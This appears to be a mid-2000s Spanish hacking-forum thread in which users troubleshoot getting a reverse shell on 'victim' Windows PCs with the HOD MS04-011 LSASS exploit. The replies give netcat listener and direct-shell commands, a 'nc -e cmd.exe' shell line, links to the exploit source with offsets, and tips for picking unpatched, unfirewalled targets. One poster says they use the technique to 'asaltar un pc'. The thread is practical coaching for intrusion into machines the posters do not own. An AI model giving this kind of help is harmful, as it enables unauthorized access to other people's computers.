Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)
Autor
|
Tema: Sobre netcat y exploit reverse shell (Leído 2,820 veces)
|
Nosferatu
Euskadi, bat eta askea!
|
Saludos a todos; Me ha surgido una duda. He utilizado el exploit remoto lsass para atacar un pc: HOD-ms04011-lsasrv-expl 0 ip.ip.ip.ip 445 mi.ip.mi.ip Ha aparecido, Connecting...OK.... Attacking...OK y al hacer netstat -a -n me aparece la ip victima esperando por el puerto 445, osea, ha funcionado (supongo) pero el proble esta en poner nc a la escucha por ese puerto: nc -vv -l -p 445 y aparece el siguiente error: Can't grab 0.0.0.0:445 with bind Alguien sabe a que se debe? Gracias de antemano y salu2 PD: Tampoco me deja dejarlo a la escucha antes de utilizar el exploit, y tampoco dejarlo a la escucha en el puerto 135
|
|
|
|
|
|
Triste zaudenean, triste zaudenean, pentsa esazu, zure lagun onenean
|
|
|
|
Gospel
|
Primero debes poner en escucha el nc y luego ejecutar el exploit para q te devuelva la shell al puerto en escucha del connectback IP. Lo estás haciendo al revés.
Prueba otro puerto q no sea 445 o 139, ya q normalmente Windows ya los tiene ocupados por defecto para el protocolo NetBIOS. Si utlizas esos puertos pq piensas q así la víctima no notará conexiones por puertos raros te equivocas. El puerto 445 es el puerto destino de tu IP, el puerto origen de la víctima será "medioaleatorio"...
|
|
|
|
|
|
|
|
|
Nosferatu
Euskadi, bat eta askea!
|
Saludos; Gracias gospel por tu respuesta. ha quedado claro. Pero con el netcat no me deja poner el puerto 445 a la escucha sin ejecutar exploit ni nada. simplemente, enciendo PC ejecuto netcat y me da error. aunque eso ya no es problema  Nada mas, gracias de nuevo y salu2
|
|
|
|
|
|
|
|
|
|
Gospel
|
Pues claro q no te deja poner en el nc en escucha en el puerto 445!! C:\Documents and Settings\Breeze>nc -vv -l -p 445 Can't grab 0.0.0.0:445 with bind
C:\Documents and Settings\Breeze>netstat -an
Conexiones activas
Proto Dirección local Dirección remota Estado TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 10.10.0.69:139 0.0.0.0:0 LISTENING No ves q el puerto ya esta siendo utilizado por el protocolo NetBIOS?? Prueba con otro puerto q no esté en uso...
|
|
|
|
|
|
|
|
|
Nosferatu
Euskadi, bat eta askea!
|
Gracias de nuevo por tu nueva respuesta, pero, lo extraño es que no suelo tener habilitado el netbios, excepto cuando decido asaltar un pc mediante el... sera que en ese momento, lo habria habilitado y se me fuera la olla  Pero la pregunta en si ha quedado respondida claramente Gracias otra vez y salu2
|
|
|
|
|
|
|
|
|
edipo
|
HOLA ATODOS EL PROBLEMA ES EL SIGUIENTE: BUENO UTILIZO ELC:\HOD-ms04011-lsasrv-expl.exe EXPLOIT Y QUE DICE ATAKING OK PERO LUEGO AL INTENTAR CONECTARME NO SE CONECTA QUE PUEDO HACER; ADEMAS E INTENTADO DEJAR AL NC AL ESCUCHA EN EL PORT 6000 Y NO APARECE NADA LUEGO AL VER SI FUNCIONO EL EXPLOIT
[tr]nc -vv -e cmd.exe ipvictima 6000[/tr]
y muestra lo siguiente: nombremaquina ip purto <?> timedout
si no estoy mal hay esta a la escucha? pero como me concto
psdta: ya intente con dejar el nc a la escucha y directamente
en si cual es el problema
|
|
|
|
|
|
|
|
|
|
Gospel
|
Has comprobado si la víctima es vulnerable primero?? Si lanzas exploits al tuntun no esperes q te funcione, y menos con vulnerabilidades tan parcheadas como Ms04-011... Busca por el foro un link q puse para descargarse el scanner de Retina Sasser y comprueba q la víctima es vulnerable. Puede q ya tenga el parche instalado y por eso no consigues acceder... nc -vv -e cmd.exe ipvictima 6000 Oye, q se supone q estas haciendo con esto?? Mírate la sintaxis del netcat en el paper sobre Netcat del foro de Hacking Avanzado. El exploit HoD para Ms04-011 admite tanto shell directa como reverse shell, pero la sintaxis q tu utilizas no es la correcta para el atacante... Shell directa [Atacante]: nc IP_victima puerto Reverse Shell [Atacante]: nc -l -p puerto -vv
|
|
|
|
« Última modificación: 28 Mayo 2005, 13:59 por Gospel »
|
|
|
|
|
kicking people
|
Puse a la escucha el nc en el puerto 800 nc -l -p 800 -vv y tire el exploit de la siguiente manera lsass 0 xxx.xxx.xxx.xxx y me sale - Target: Ip: xxx.xxx.xxx.xxx:OS: Winxp Professional [universal] lsass.exe
- connecting to xxx.xxx.xxx.xxx ... OK
- Attacking ... OK
pero no me devuelve la shell... tengo que especificar cuando ataco con el lsass a que puerto me lo tiene que devolver?? asi probe tambien pero me da lo mismo y no me aparece nada
|
|
|
|
|
|
|
|
|
|
Gospel
|
Nooooo!! Es obvio! Si llamas al exploit y le pasas como parámetros únicamente 0 xxx.xxx.xxx.xxx, como sabe luego a q connectback ip y puerto destino debe devolver la shell remota?? Joer... mírate la sintaxis del exploit... se especifica claramente.
Vuelvo a repetir: Has comprobado si la víctima es vulnerable a ms04-011? Si no es así, estás perdiendo el tiempo...
En fin, ya se ha hablado sobre este exploit en el foro, si no os funciona, mala suerte! Habéis llegado 1 año tarde y ya todo el mundo está parcheado o tiene SP2.
|
|
|
|
|
|
|
|
|
kicking people
|
Gracias pero el xploit que tengo solo me dice que ponga (so) y (ip) ya probe de la otra manera no esta parcheado
|
|
|
|
|
|
|
|
|
|
|
|
Gospel
|
Toda la información q necesitas está aquí: [!] MS04-011: Windows LSASRV.DLL RPC Buffer Overflow + lsass @ http://www.k-otik.com/exploits/04252004.ms04011lsass.c.php- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1 - Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1 - Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp) Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp) - http://foro.elhacker.net/index.php/topic,30260.0+ houseofdabus @ http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1 - Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1 - Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp) Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp) Nada de pedir ejecutables, compila el código de k-otik q funciona seguro. Sigue las instrucciones q vienen comentadas al principio de cada exploit. Antes de lanzar el exploit, comprueba q la víctima es vulnerable: es decir, no tiene parche de Ms04-011 (sasser), no tiene SP2, no tiene firewall, etc.
|
|
|
|
|
|
|
|
|
kicking people
|
Gracias pero no me sirve no se programar en c por eso tengo que buscarlo compilado, perdon no es de vago, pero recien en 3º año de mi escuela me enseñan a programar en c y me faltan 3 años
|
|
|
|
|
|
|
|
|
|
|